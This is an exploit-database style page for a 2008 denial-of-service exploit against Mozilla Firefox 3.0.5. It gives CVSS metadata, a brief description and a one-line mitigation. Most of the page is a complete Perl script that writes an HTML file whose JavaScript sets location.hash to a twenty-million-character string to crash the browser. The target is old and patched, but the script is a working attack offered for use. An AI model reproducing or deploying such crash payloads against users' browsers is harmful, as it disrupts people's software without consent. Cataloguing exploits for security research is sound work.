header-logo
Suggest Exploit
vendor:
Firefox
by:
Jeremy Brown
7.5
CVSS
HIGH
Denial of Service
20
CWE
Product Name: Firefox
Affected Version From: 3.0.5
Affected Version To: 3.0.5
Patch Exists: YES
Related CWE: N/A
CPE: Mozilla:Firefox:3.0.5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2008

Mozilla Firefox 3.0.5 location.hash Denial of Service Exploit

This exploit is for Mozilla Firefox 3.0.5. It creates an HTML file with a JavaScript code that sets the location.hash to a large string of 'A's, causing the browser to crash. It has been tested to crash on Vista, and can be played with on XP.

Mitigation:

Update to the latest version of Mozilla Firefox.
Source

Exploit-DB raw data:

#!/usr/bin/perl
# mzff_lhash_dos.pl
# Mozilla Firefox 3.0.5 location.hash Denial of Service Exploit
# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]
# Crash on Vista, play with it on XP

$filename = $ARGV[0];
if(!defined($filename))
{

     print "Usage: $0 <filename.html>\n\n";

}

$head = "<html>" . "\n" . "<script type=\"text/javascript\">" . "\n";
$trig = "location.hash = \"" . "A" x 20000000 . "\";" . "\n";
$foot = "</script>" . "\n" . "</html>";

$data = $head . $trig . $foot;

     open(FILE, '>' . $filename);
     print FILE $data;
     close(FILE);

exit;

# milw0rm.com [2008-12-23]